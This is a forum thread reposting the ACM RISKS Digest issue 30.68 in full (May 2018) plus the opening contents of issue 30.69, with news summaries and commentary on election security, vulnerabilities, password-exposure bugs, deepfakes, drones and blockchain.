Risks Digest

Discussion in 'Gator Bytes' started by LakeGator, Apr 25, 2015.

  1. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.68

    RISKS List Owner

    May 5, 2018 8:34 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 5 May 2018 Volume 30 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Iowa Lottery fraud resolved (PGN on NYTimes item)
    "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)
    Lightning Struck Her Home. Then Her Brain Implant Stopped Working (NY Times)
    KRACK Wi-Fi vulnerability can expose medical devices, patient records
    (Charlie Osborne)
    "A critical security flaw in popular industrial software put power plants
    at risk" (Zack Whittaker)
    "Oracle Access Manager security bug so serious it let anyone access
    protected data" (Lian Tung)
    How not to announce a loss of secure information (SMH)
    Why Silicon Valley can't fix itself (The Guardian)
    "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Lian Tung)
    China's bungled drone display breaks world record (via BBC.com)
    When a stranger takes your face, Facebook failed crackdown on fake accounts
    (WashPo)
    The Era of Fake Video Begins (Franklin Foer)
    Souped-up smartphones, robots to help police fight crime more effectively
    (Straits Times)
    "GitHub says bug exposed some plaintext passwords" (ZDNet)
    "Gaming: The System" (NY Times)
    France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)
    Transparent Eel-Like Soft Robot Can Swim Silently Underwater (ACM Technews)
    He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)
    Is My Not-So-Smart House Watching Me? (NYTimes)
    Following the Trail of Online Ads, Wherever It Leads (NYTimes)
    Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)
    Facebook's dating service is a chance to meet the catfisher, advertiser,
    or scammer of your dreams (WashPo)
    Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)
    Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe, John Levine)
    Keeping your *Twitter* account secure (Gabe Goldberg)
    Against Trendism: how to defang the social media disinformation complex
    (Medium via John Ohno)
    Letter to *Consumer Reports* responding to June article about connected cars
    (Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 3 May 2018 14:06:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Iowa Lottery fraud resolved (NYTimes)

    The Iowa Hot Lotto fraud scandal has now been resolved. A programmer who
    happened to be the info-security head for the Multi-State Lottery
    Association managed to slip in a piece of code into the proprietary system
    that changed the randomness on just three chosen days in the year. This
    enabled a would-be payoff of $14.3M. The collaborators were detected when
    they attempted to collect.
    The Man Who Cracked the Lottery

    This is reminiscent of the Harrah's Tahoe six-slot-machine progressive
    payoff noted way back in RISKS-1.01 (where a shill chosen to collect the
    payoff never showed up, because he had a record and feared exposure [perhaps
    he was in a witness-protection program?], and the more recent Breeder's Cup
    off-track pick-six $3M scam (RISKS-22.33,38-40) -- in which bets on the
    first four races were altered by an insider after those races were over, and
    the next races wildcarded to cover all possible horses, but in a system in
    which the bets were never transmitted until after the fourth race (to save
    bandwidth?).

    The combination of proprietary code that cannot be inspected externally and
    the insider being the IT security person should recall the corresponding
    situation with proprietary election systems that can be hacked or rigged by
    insiders. [And then read Gene Wirchenko's next item! PGN]

    ------------------------------

    Date: Thu, 03 May 2018 09:01:31 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)

    J.M. Porup, CSO, 2 May 2018
    Online voting is impossible to secure. So why are some governments using it?

    If you thought electronic voting machines were insecure, wait until you meet
    online voting.

    selected text:

    A researcher at the University of Melbourne in Australia, Teague has twice
    demonstrated massive security flaws in the online voting systems used in
    state elections in Australia -- including one of the largest deployments of
    online voting ever, the 2015 New South Wales (NSW) state election, with
    280,000 votes cast online.

    The response? Official complaints about her efforts to university
    administrators, and a determination by state election officials to keep
    using online voting, despite ample empirical proof, she says, that these
    systems are not secure.

    While insecure voting machines have received most of the attention since the
    2016 U.S. presidential election, states and municipalities continue to use
    -- even enthusiastically adopt -- web-based online voting, including 31
    states in the U.S., two provinces in Canada, and two states in Australia.
    Wales in the UK is pushing hard for online voting. The country of Estonia
    uses online voting for its national elections.

    Security researchers point out flaws; election officials get angry and
    ignore security issues that threaten the integrity of the voting
    results. Teague's story repeats itself around the world.

    The NSW state election of 2015 was so insecure that one seat in the upper
    house of the state parliament may have been decided by hacked votes. In
    response to the scandal, the electoral commission went to great lengths to
    avoid transparency regarding the security issues Teague and her team
    reported, and only revealed the true nature of the problem under close
    questioning in state parliament a year later.

    Before the election, the state electoral commission told the Australian
    Broadcasting Corporation (ABC) that "People's vote is completely secret...
    It's fully encrypted and safeguarded, it can't be tampered with." Yet it
    took researchers only a few days to identify fatal flaws in the online
    voting web application that could have easily been used to spy on and even
    modify every single vote cast online, and to do so in an undetectable
    manner.

    The NSW electoral commission initially reported after the election that
    there were no anomalies seen while using the online voting platform, but a
    year later, under questioning in state parliament, admitted that there were,
    in fact, significant anomalies reported by voters. More than 600 voters who
    attempted to verify their votes using a rudimentary telephone-based system
    were unable to do so -- a 10 percent failure rate, enough to call into
    question the voting result of the state election. "That to me is the bottom
    line," Teague says. "The really important thing is that we didn't find out
    the truth at the time."

    ------------------------------

    Date: Fri, 04 May 2018 08:12:36 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Lightning Struck Her Home. Then Her Brain Implant Stopped Working
    (NY Times)

    Lightning Struck Her Home. Then Her Brain Implant Stopped Working.

    ------------------------------

    Date: Tue, 01 May 2018 09:38:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Charlie Osborne)

    Charlie Osborne for Zero Day, 1 May 2018
    KRACK Wi-Fi vulnerability can expose medical devices, patient records | ZDNet

    selected text:

    Medical devices produced by Becton, Dickinson and Company (BD) are
    vulnerable to the infamous KRACK bug, potentially exposing patient records.
    Discovered in October, KRACK, which stands for Key Reinstallation Attack,
    exploits a flaw in the Wi-Fi Protected Access II (WPA2) protocol which is
    used to secure modern wireless networks.

    If exploited, KRACK gives threat actors the key required to join wireless
    networks which would otherwise require a password for authentication. Once
    they have joined, they can snoop on network traffic, perform
    Man-in-The-Middle (MiTM) attacks, hijack connections, and potentially send
    out crafted, malicious network packets.

    In a security bulletin, BD said that successful exploit in a select range of
    products could also lead to patient record changes or exfiltration, as well
    as major IT disruptions.

    ------------------------------

    Date: Wed, 02 May 2018 08:59:05 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A critical security flaw in popular industrial software put power
    plants at risk" (Zack Whittaker)

    Zack Whittaker for Zero Day, 2 May 2018
    The bug in the industrial control software could leave power and
    manufacturing plants exposed. A severe vulnerability in a widely used
    industrial control software could have been used to disrupt and shut down
    power plants and other critical infrastructure.
    Industrial software used to run power plants was easily hackable

    ------------------------------

    Date: Thu, 03 May 2018 09:15:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Oracle Access Manager security bug so serious it let anyone
    access protected data" (Lian Tung)

    By Liam Tung | May 3, 2018 -- 12:42 GMT (05:42 PDT) | Topic: Security
    The moral? Don't roll your own crypto, security researcher tells Oracle.
    Oracle Access Manager security bug so serious it let anyone access protected data | ZDNet

    selected text:

    A bug that Oracle recently patched broke the main functionality of Oracle
    Access Manager (OAM), which should only give authorized users access to
    protected enterprise data.

    However, researchers at Austrian security firm SEC-Consult found a flaw in
    OAM's cryptographic format that allowed them to create session tokens for
    any user, which the attacker could use to impersonate any legitimate user
    and access web apps that OAM should be protecting.

    "What's more, the session cookie crafting process lets us create a session
    cookie for an arbitrary username, thus allowing us to impersonate any user
    known to the OAM."

    ------------------------------

    Date: Fri, 4 May 2018 11:08:29 +1000
    From: Dave Horsfall <da...@horsfall.org>
    Subject: How not to announce a loss of secure information (SMH)

    The Commonwealth Bank of Australia, who are in enough trouble as it is with
    major scandals, did not tell its customers that some "tapes" went missing on
    their way to be destroyed.

    Almost 20 million bank account records lost by Commonwealth Bank

    ``The tapes contained customer names, addresses, account numbers and
    transaction details from 19.8 million accounts spanning 2000 to early
    2016. They did not contain passwords, PINs or other data which could be
    used to enable account fraud, CBA said in a statement on Wednesday night
    after BuzzFeed broke the story.''

    So, plenty of account numbers and transaction details etc, but we've got
    nothing to worry about, right? Perhaps they should be reading RISKS...

    Dave Horsfall VK2KFU North Gosford NSW 2250 Australia

    ------------------------------

    Date: Sat, 5 May 2018 11:04:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Why Silicon Valley can't fix itself (The Guardian)

    Tech insiders have finally started admitting their mistakes -- but the
    solutions they are offering could just help the big players get even more
    powerful.

    http://www.theguardian.com/news/2018/may/03/why-silicon-valley-cant-fix-itself-tech-humanism

    ------------------------------

    Date: Wed, 02 May 2018 09:02:16 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Lian Tung)

    Liam Tung, ZDNet, 2 May 2018

    The Google Maps URL-sharing feature allows scammers to send victims to any
    site they choose. Scammers are using the Google Maps URL-sharing feature to
    direct victims not to Maps but any shady website the crooks want. According
    to security firm Sophos, scammers are taking advantage of the fact the URL
    sharing feature in Google Maps isn't an official product and lacks a
    mechanism to report scammy links.

    That's unlike Google's soon-to-be retired URL shortener goo.gl, which can be
    used to conceal links to malware or phishing sites, but also has a simple
    way for recipients to report scam links.

    Google Maps user? Beware attackers using URL-sharing to send you to shady sites | ZDNet

    ------------------------------

    Date: Thu, 03 May 2018 09:29:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China's bungled drone display breaks world record (via BBC.com)



    Swarm intelligence is complicated to coordinate. "I believe everything
    happens for a reason. Usually, the reason is that somebody screwed up."
    (From Maxine -- the Hallmark Shoebox card character on 23JUN2007).Â

    ------------------------------

    Date: Sat, 05 May 2018 00:54:41 +0000
    From: Richard M Stein <rms...@ieee.org>
    Subject: When a stranger takes your face, Facebook failed crackdown on fake
    accounts (WashPo)

    When a stranger takes your face: Facebook’s failed crackdown on fake accounts

    Perhaps a biometric supplement would boost authentication accuracy?

    Would be good to learn Facebook user profile photo match rate against the
    FBI's NCIC to test hit/miss rate. How many convicted felons or fugitives use
    Facebook? Given this information, update T&Cs to hedge against
    authentication theft.

    ------------------------------

    Date: Sun, 29 Apr 2018 23:41:00 +0000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: The Era of Fake Video Begins (Franklin Foer)

    Franklin Foer, *The Atlantic*, May 2018 Issue
    The digital manipulation of video may make the current era of fake news seem
    quaint.
    The Era of Fake Video Begins

    EXCERPT:

    In a dank corner of the Internet, it is possible to find actresses from Game
    of Thrones or Harry Potter engaged in all manner of sex acts. Or at least to
    the world the carnal figures look like those actresses, and the faces in the
    videos are indeed their own. Everything south of the neck, however, belongs
    to different women. An artificial intelligence has almost seamlessly
    stitched the familiar visages into pornographic scenes, one face swapped for
    another. The genre is one of the cruelest, most invasive forms of identity
    theft invented in the Internet era. At the core of the cruelty is the acuity
    of the technology: A casual observer can't easily detect the hoax.

    This development, which has been the subject of much hand-wringing in the
    tech press, is the work of a programmer who goes by the nom de hack
    *deepfakes*. And it is merely a beta version of a much more ambitious
    project. One of deepfakes' compatriots told Vice's Motherboard site in
    January that he intends to democratize this work. He wants to refine the
    process, further automating it, which would allow anyone to transpose the
    disembodied head of a crush or an ex or a co-worker into an extant
    pornographic clip with just a few simple steps. No technical knowledge would
    be required. And because academic and commercial labs are developing even
    more-sophisticated tools for non-pornographic purposes -- algorithms that
    map facial expressions and mimic voices with precision -- the sordid fakes
    will soon acquire even greater verisimilitude. The Internet has always
    contained the seeds of postmodern hell. Mass manipulation, from clickbait to
    Russian bots to the addictive trickery that governs Facebook's News Feed, is
    the currency of the medium. It has always been a place where identity is
    terrifyingly slippery, where anonymity breeds coarseness and confusion,
    where crooks can filch the very contours of selfhood. In this respect, the
    rise of deepfakes is the culmination of the Internet's history to date --
    and probably only a low-grade version of what's to come.

    ------------------------------

    Date: Thu, 03 May 2018 17:19:08 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Souped-up smartphones, robots to help police fight crime more
    effectively (Straits Times)

    http://www.straitstimes.com/singapo...s-to-help-police-fight-crime-more-effectively

    "New technology unveiled on Thursday (May 3) will make it easier for the
    police to fight crime and enforce the law.

    "Souped-up smartphones will allow officers to respond faster and more
    effectively to incidents, as well as call up key information on a
    case. Robots on patrol can aid in the detection of suspicious activities,
    and handheld scanners will make it easier to take real- time 3D scans of
    crime scenes to aid in crime solving."

    The article has several photos (showing 3 unique autonomous patrol unit
    configurations) and lists the autonomous patrol unit's h/w specification.

    ------------------------------

    Date: Wed, 02 May 2018 08:55:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "GitHub says bug exposed some plaintext passwords" (ZDNet)

    http://www.zdnet.com/article/github-says-bug-exposed-account-passwords/

    Zack Whittaker for Zero Day, 1 May 2018
    A small but unspecified number of GitHub staff could have seen plaintext
    passwords. GitHub has said a bug exposed some user passwords -- in
    plaintext.

    ------------------------------

    Date: Mon, 30 Apr 2018 09:57:26 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: "Gaming: The System" (NY Times)

    https://www.nytimes.com/2018/04/28/opinion/sunday/gaming-the-system.htm

    ``My gamified life may be nutty and sad, but it doesn't hurt anyone. At
    least that's what I thought until a few months ago, when my new car
    insurance company, Liberty Mutual, invited me to join a program its
    website describes this way: Using a small device that observes your
    driving habits, we'll notice the safe choices you're making on the road
    and reward you for them. The company promised a rate reduction of at
    least 5 percent and up to 30 percent, based on driving performance over a
    three-month period. Best of all, an app would let me track the size of my
    discount in real time.''

    Technology gamifies our lives as consumers -- a dopamine burst sustains
    product interest boosted by a loyalty discount, while data capture
    algorithms gleefully score your profile. Several economics Nobel prizes
    attest to reward incentive influence on consumer behavior. Is gamification
    deployed by social media bots that promote political candidates? Is
    gamification deployed by industries opposing environmental or health
    legislation? Has gamification emerged as a new public health threat
    exploiting the brain's addiction channel?

    See RISKS-29.21 for the first mention of 'gamification' in comp.risks: "The
    brain-imaging experiment showed how the students concentrated and learned
    better when studying was part of a game."

    ------------------------------

    Date: Mon, 30 Apr 2018 00:38:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)

    http://arstechnica.com/tech-policy/...com-from-man-whos-had-it-since-94-so-he-sues/

    Nice domain you have there. Would be a shame if anything happened to it...

    ------------------------------

    Date: Wed, 2 May 2018 12:31:36 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Transparent Eel-Like Soft Robot Can Swim Silently Underwater

    University of California, San Diego (04/24/18) Ioana Patringenaru
    via ACM TechNews, Wednesday, 2 May 2018

    Researchers at the University of California, San Diego and the University of
    California, Berkeley have created a nearly-transparent eel-like robot that
    can swim silently in salt water using artificial muscles. Critical to the
    new technology is the use of the salt water in which the robot swims, to
    generate the electrical forces that propel it. The robot delivers negative
    charges to the water just outside itself, and positive charges inside the
    robot to trigger its muscles to bend, creating the robot's swimming motion.
    The charges carry very little current, making them safe for marine life. The
    technology is an important step toward a future when soft robots can swim in
    the ocean alongside fish and invertebrates without harming them, the
    researchers say.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1b1b0x215c58x070332&

    [The technology is fascinating, with lots of opportunities here. Risks?
    Sharks might devour but not digest the robots, heat-sensing creatures
    might cuddle up to them, or even befriend them, or redirect robots that
    are stealthy torpedos to another target! PGN]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:31:40 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)

    http://www.nytimes.com/2018/04/29/world/europe/uk-autopilot-driver-no-hands.html

    The British man was barred from driving for 18 months after being videotaped
    sitting with his hands behind his head, cruising at 40 miles per hour in
    *heavy* traffic.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:05 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is My Not-So-Smart House Watching Me? (NYTimes)

    http://www.nytimes.com/2018/04/27/realestate/is-my-not-so-smart-house-watching-me.html

    Smart-house technology has made it easier to turn on the lights and set the
    thermostat, but sometimes objects go rogue.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:55 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Following the Trail of Online Ads, Wherever It Leads (NYTimes)

    http://www.nytimes.com/2018/04/18/technology/personaltech/online-advertising-tracking.html

    Sapna Maheshwari, who covers advertising for The Times, discusses how she
    tracks the online ads that track us.

    ------------------------------

    Date: Fri, 4 May 2018 23:50:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)

    Criminals have discovered another use for drones -- to distract and spy on
    law enforcement.

    They recently tried to thwart an FBI hostage rescue, Joe Mazel, chief of the
    FBI's operational technology law unit, said this week, according to a report
    by news site Defense One.

    Mazel, speaking at the AUVSI Xponential drone conference in Denver, said
    that criminals launched a swarm of drones at an FBI rescue team during an
    unspecified hostage situation near a large U.S. city, confusing law
    enforcement. The criminals flew the drones at high speed over the heads of
    FBI agents to drive them away while also shooting video that they then
    uploaded to YouTube as a way to alert other nearby criminal members about
    law enforcement's location.

    http://fortune.com/2018/05/04/drone-fbi-hostage-criminals/

    ------------------------------

    Date: Thu, 3 May 2018 19:44:28 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook's dating service is a chance to meet the catfisher,
    advertiser, or scammer of your dreams (WashPo)

    via NNSquad

    http://www.washingtonpost.com/news/...tfisher-advertiser-or-scammer-of-your-dreams/

    The love-seeking singles of Facebook's new dating service, privacy experts
    say, may not be prepared for what they'll encounter: sham profiles,
    expanded data gathering and a new wave of dating fraud. Facebook -- under
    fire for viral misinformation, fake accounts and breaches of tr[sic]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:02:35 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)

    Nathaniel Popper, The New York Times, 29 Apr 2018

    http://www.nytimes.com/2018/04/29/technology/blockchain-iso-russian-spies.html

    EXCERPT:

    Russian interest in the technology surrounding virtual currencies, like in
    this crypto-mining operation in Moscow, is growing. Last year, employees of
    Russia's spy agency attended a meeting where international standards for the
    so-called blockchain were discussed. Andrey Rudakov/Bloomberg

    SAN FRANCISCO -- Last year, representatives of 25 countries met in Tokyo to
    work on setting international standards for the blockchain, the technology
    that was introduced by the virtual currency Bitcoin and has ignited intense
    interest in corporate and government circles.

    Some of the technologists at the meeting of the International Standards
    Organization were surprised when they learned that the head of the Russian
    delegation, Grigory Marshalko, worked for the FSB, the intelligence agency
    that is the successor to the KGB.

    They were even more surprised when they asked the FSB agent why the Russians
    were devoting such resources to the blockchain standards.

    ``Look, the Internet belongs to the Americans -- but blockchain will belong
    to us,'' he said, according to one delegate who was there. The Russian added
    that two other members of his country's four-person delegation to the
    conference also worked for the FSB.

    Another delegate who had a separate conversation with the head of the
    Russian group remembers a slightly different wording: ``The Internet
    belonged to America. The blockchain will belong to the Russians.''

    Both of the delegates who recounted their conversations did so on the
    condition of anonymity, because discussions at the International Standards
    Organization are supposed to be confidential. Neither the Russian
    organizations overseeing the delegation to the ISO nor the Russian delegates
    responded to requests for comment.

    ------------------------------

    Date: Sat, 5 May 2018 09:22:23 -0400
    From: "Dave Farber" <far...@gmail.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe)

    Kai Stinchcombe, Medium, 5 Apr 2018 [Via Dave's IP distribution]


    Blockchain is not only crappy technology but a bad vision for the future.
    Its failure to achieve adoption to date is because systems built on trust,
    norms, and institutions inherently function better than the type of
    no-need-for-trusted-parties systems blockchain envisions. That's permanent:
    no matter how much blockchain improves it is still headed in the wrong
    direction.

    This December I wrote a widely-circulated article on the inapplicability of
    blockchain to any actual problem. People objected mostly not to the
    technology argument, but rather hoped that decentralization could produce
    integrity. [...]

    ------------------------------

    Date: May 5, 2018 at 1:49:22 PM EDT
    From: "John Levine" <jo...@iecc.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Re: Stinchcombe)
    Well, gee, everything he says is self-evidently true.

    Bitcoins remind me of a story from the late chair of the Princeton U.
    astronomy department. In 1950 Immanuel Velikovsky published "Worlds in
    Collision", a controversial best selling book that claimed that 3500 years
    ago Venus and Mars swooped near the earth, causing `catastrophes that were
    passed down in religions and mythologies.

    The astronomer was talking to an anthropologist at a party and the book came
    up.

    "The astronomy is nonsense," said the astronomer, "but the anthropology is
    really interesting."

    "Funny," replied the anthropologist, "I was going to say almost the same
    thing."

    Bitcoin and blockchains lash together an unusual distributed database with a
    libertarian economic model. People who understand databases realize that
    blockchains only work as long as there are incentives to keep a sufficient
    number of non-colluding miners active, preventing collusion is probably
    impossible, and that scaling blockchains up to handle an interesting
    transaction rate is very hard, but that no-government money is really
    interesting.

    People who understand economics and particularly economic history understand
    why central banks manage their currencies, thin markets like the ones for
    cryptocurrencies are easy to corrupt, and a payment system nees a way to
    undo bogus payments, but that free permanent database ledger is really
    interesting.

    Not surprisingly, the most enthusiastic bitcoin and blockchain proponents
    are the ones who understand neither databases nor economics.

    ------------------------------

    Date: Thu, 3 May 2018 22:56:28 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Keeping your *Twitter* account secure

    Or not.

    http://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html

    When you set a password for your Twitter account, we use technology that
    masks it so no one at the company can see it. We recently identified a bug
    that stored passwords unmasked in an internal log. We have fixed the bug,
    and our investigation shows no indication of breach or misuse by anyone.

    ------------------------------

    Date: Fri, 04 May 2018 14:15:59 +0000
    From: John Ohno <john...@gmail.com>
    Subject: Against Trendism: how to defang the social media disinformation
    complex (Medium)



    There's an essential mistake that almost every social media platform makes
    -- one inherited from marketing (where it makes some sense), and one that is
    mostly unexamined and unaccounted-for even in otherwise fairly
    socially-conscious projects like Mastodon and Diaspora. In almost every one
    of these systems, incentives exist that confuse popularity with value.

    I call this *trendism* -- the belief that an already-trending topic deserves
    to be promoted.

    In marketing, because the piece of information being spread is intended to
    sell a product, the spread of that information is, in fact, theoretically
    proportional to its value. In social media, the information being spread is
    not a piece of advertising, and while most of these systems have revenue
    models based on advertising, that advertising is generated on the fly based
    on the viewer's browsing history and has nothing to do with the content of
    the piece of information being spread.

    The thing is, ideas travel in packs. When we encounter one idea, we tend to
    see its nearest neighbours also. When we find out something new, our friends
    hear about it too. So, trending posts are rarely surprising: by the very
    nature of their popularity, they are already familiar in their essence to
    most of the people who are directed toward them.

    The information content of a message, in Claude Shannon's formulation, is
    proportional to its deviation from expectation -- information is surprise.
    Kolgorov's [Kolmogorov? PGN] formulation is similar: information content
    proportional to the smallest possible message that could say the same thing
    (which, of course, includes references to earlier messages or prior
    knowledge as a possible tactic).

    In other words, from an information-theoretic perspective, a post that only
    tells you things you already know is worthless. Yet, trending content is
    almost always composed solely of things the viewer has already seen.

    There's one piece of information that a copy of a viral post actually has --
    the association between the content of the post and the person posting it.
    We share posts we've already seen as a way of expressing our identity, both
    personally and within a group. That is the only form of information valued
    by trending-oriented systems: tribal affiliation.

    If we want to force our social media platforms into information-rich
    environments and lower the amount of tribal rivalry we are exposed to, there
    are a couple general-purpose solutions, and they all come down to
    kneecapping the machinery of trendism.

    1. Rather than block political content (only one kind of tribalist
    content, and one that is at least theoretically grounded in genuine
    philosophical differences about the ideal shape of the world, rather than
    geography or social groups), we should block all shared content. Remove
    retweets and shares from your feed entirely. Most of them are things you
    have already seen, and most of the rest don't contain meaningful or useful
    information.

    2. Emotionally-manipulative posts get the most engagement, and are
    therefore ranked higher in feeds. (I don't want to be emotionally
    manipulated. Do you?)* To defeat this ranking, force your feed to
    reverse-chronological order. To filter out emotionally-manipulative posts,
    filter out anything with more than a set number of interactions.

    3. Avoid being part of the problem. Before sharing, determine: is the
    information true? Is it new? Is it playing mostly on my emotions? If
    possible, delay your sharing for a long period of time -- read an article,
    and then wait a few hours, or even a few days, before deciding whether or
    not it is of sufficient quality to actually re-post.

    4. Identify when you are being drawn into heated arguments, and ignore
    them. In the heat of the moment, you're not actually making good points
    anyhow, and you're more likely to misunderstand or misrepresent your
    opponent. The suggestions from #3 apply here too for comments -- make sure
    your comments are accurate, informative, and cool, even if that means
    waiting several days to respond. Never let the system rush you.

    5. Visible metrics gamify trendism. Remove them.

    Most social media platforms don't make it easy to follow this advice.
    Mastodon is closest -- it hides metrics from the timeline by default,
    supports only reverse-chronological post ordering, and allows you to filter
    all boosts from your timeline. For everything else, you will need to use
    browser extensions.

    Facebook Demetricator ... and Twitter Demetricator [...]
    [Truncated for RISKS. PGN]

    ------------------------------

    Date: Sat, 5 May 2018 10:58:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Letter to *Consumer Reports* responding to June article about
    connected cars.

    Your otherwise-excellent article on data-hoovering connected cars doesn't
    mention the downside of manufacturers being able to update automobile
    software: risking bad updates and (worse) hackers abusing update
    mechanisms. Anyone who's endured PC/phone/tablet problems with vendor
    patches -- even had devices "bricked" (made useless) -- should be terrified
    of car updates made without owner permission. And everyone aware of today's
    hacking environment should refuse to purchase anything without understanding
    and consenting to its update mechanism.

    ------------------------------

    Date: Tue, 10 Jan 2017 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.68
    ************************
  2. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.69

    RISKS List Owner

    May 16, 2018 8:35 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 16 May 2018 Volume 30 : Issue 69

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    America continues to ignore the risks of election hacking
    (The New Yorker)
    Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)
    Virginia election officials assigned 26 voters to the wrong district
    (WashPo)
    Securing Elections (Bruce Schneier)
    Australian Emergency Calls Fail due to lightning strike (ABC AU)
    Self-driving cars' shortcomings revealed in DMV reports (Merc)
    VW bugs: "Unpatchable" remote code pwnage (TechBeacon)
    Software bug led to death in Uber's self-driving crash (Ars Technica)
    Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)
    Is technology bringing history to life or distorting it? (WashPo)
    2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)
    KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)
    Nigerian Email Scammers Are More Effective Than Ever (WiReD)
    Dark code (DW)
    Postmortem of Fortnite Service Outage (Epic Games)
    Collateral damage (538)
    Dozens of security cameras hacked in Japan (Mainichi)
    Technology turns our cities into spies for ICE, whether we like it or not
    (LATimes)
